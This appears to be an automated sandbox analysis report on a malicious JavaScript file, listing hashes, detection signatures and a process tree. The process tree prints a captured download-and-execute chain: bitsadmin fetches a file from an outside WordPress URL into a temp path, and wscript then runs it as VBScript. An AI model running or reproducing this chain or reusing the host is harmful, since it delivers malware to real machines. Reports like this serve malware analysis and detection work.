Analysis
-
max time kernel
31s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
22-03-2023 19:23
Static task
static1
Behavioral task
behavioral1
Sample
28-55-63-12.JS.js
Resource
win7-20230220-en
windows7-x64
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
28-55-63-12.JS.js
Resource
win10v2004-20230220-en
windows10-2004-x64
15 signatures
150 seconds
General
-
Target
28-55-63-12.JS.js
-
Size
120KB
-
MD5
c9d2d5758ea0bc1c82bf466b68fad4ee
-
SHA1
30daf976e08feb0ecbb6a10958d09a6e2da2bcf8
-
SHA256
b2aab26d36c289c0922a8cde64767571c9fec6daa765caee23a9b2c1fe7c0b17
-
SHA512
20f3509e7cb2ebf00e1bd0a91c4fab0981cf8b90cb088abde8da63b36f785471466503edd820acbc033fdc11832ae8e3af3d9d09257f1cd0ac19d28bc0bf983a
-
SSDEEP
384:xXWXWXWXWXWXWXWXWXWXWXWXEXWXWXWXWXWXWXWXWXWXWXWX0XWXWXWXWXWXWXWZ:i/dNx
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
wscript.exedescription pid process target process PID 1104 wrote to memory of 1688 1104 wscript.exe bitsadmin.exe PID 1104 wrote to memory of 1688 1104 wscript.exe bitsadmin.exe PID 1104 wrote to memory of 1688 1104 wscript.exe bitsadmin.exe PID 1104 wrote to memory of 268 1104 wscript.exe wscript.exe PID 1104 wrote to memory of 268 1104 wscript.exe wscript.exe PID 1104 wrote to memory of 268 1104 wscript.exe wscript.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\28-55-63-12.JS.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://theemirateshills.com//wp-includes/js/information.txt C:\Users\Admin\AppData\Local\TempVB2⤵
- Download via BitsAdmin
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\Admin\AppData\Local\TempVB2⤵